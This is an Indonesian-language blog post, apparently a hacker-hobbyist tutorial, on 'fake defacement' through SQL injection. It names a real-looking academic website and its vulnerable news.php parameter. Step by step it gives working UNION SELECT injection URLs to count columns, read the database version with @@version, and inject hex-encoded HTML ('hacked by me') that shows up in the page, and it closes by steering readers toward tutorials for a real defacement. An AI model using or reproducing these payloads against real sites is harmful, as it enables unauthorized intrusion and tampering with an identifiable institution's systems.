deface palsu via sql injection?
maksudnya?
buat yg master,jgn d baca yahhh...
cm niat utk share kok...hhe ..
pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
gmn crnya ?
lnjut ..
1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
kl lupa nihh
Code:
http://hacker-newbie.org/showthread.php?tid=97
2.nah misal ud dpt target nihh..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--
3.cek versinya...
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--
eh ternyata versi 4..
drpd cape ngeblind..
yaudah buat gaya2an..deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,
buka ini
Code:
http://dieq41.com/tools/text.html
Code:
<h1>hacked by me</h1>
trus kl ud d masukin..
liat bagian hexadecimal,bakal muncul:
Code:
3C68313E6861636B6564206279206D653C2F68313E
nah kode d atas tuh kodehasil convert dr ascii ke hex..
nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi
Code:
0x3C68313E6861636B6564206279206D653C2F68313E
oke,coba masukin d angka 3 ,yg script hex nyaa..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4,5,6,7,8,9--
ew.kok ada hacked by me?
hhe..itu tandanya udah berhasil sob..
makanya ak bilang ini cm client aja..
ask : kl mau deface bneran?
yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..
ok sob smua,makasih2.
0 komentar:
Posting Komentar